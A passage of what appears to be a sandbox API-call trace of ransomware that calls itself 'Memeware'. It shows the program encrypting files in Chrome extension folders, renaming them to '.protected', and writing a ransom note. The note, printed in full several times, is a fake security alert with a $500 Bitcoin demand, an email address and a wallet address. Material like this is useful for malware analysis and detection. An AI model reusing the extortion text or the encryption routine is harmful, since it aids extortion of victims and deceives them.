SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.039] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.040] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.040] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.040] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.040] CloseHandle (hObject=0x164) returned 1 [0081.040] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0081.040] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0081.040] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr") returned 145 [0081.040] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0081.040] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0081.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*") returned 147 [0081.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\.") returned 147 [0081.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\..") returned 148 [0081.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.041] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.041] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.041] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0081.042] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.042] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c4, lpOverlapped=0x0) returned 1 [0081.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.043] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c4, lpOverlapped=0x0) returned 1 [0081.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.044] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.044] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.045] CloseHandle (hObject=0x168) returned 1 [0081.045] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected") returned 169 [0081.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.protected")) returned 1 [0081.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.045] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\RESTORE_FILES.txt") returned 163 [0081.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.046] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.047] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.047] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.047] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.047] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.047] CloseHandle (hObject=0x164) returned 1 [0081.047] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0081.047] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi") returned 145 [0081.047] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0081.047] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0081.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*") returned 147 [0081.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\.") returned 147 [0081.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.048] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\..") returned 148 [0081.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.048] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.048] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.048] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.049] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.049] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.050] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.050] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x3ad, lpOverlapped=0x0) returned 1 [0081.051] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x3ad, lpOverlapped=0x0) returned 1 [0081.051] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.051] CloseHandle (hObject=0x168) returned 1 [0081.052] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected") returned 169 [0081.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected")) returned 1 [0081.052] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.052] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\RESTORE_FILES.txt") returned 163 [0081.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.053] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo 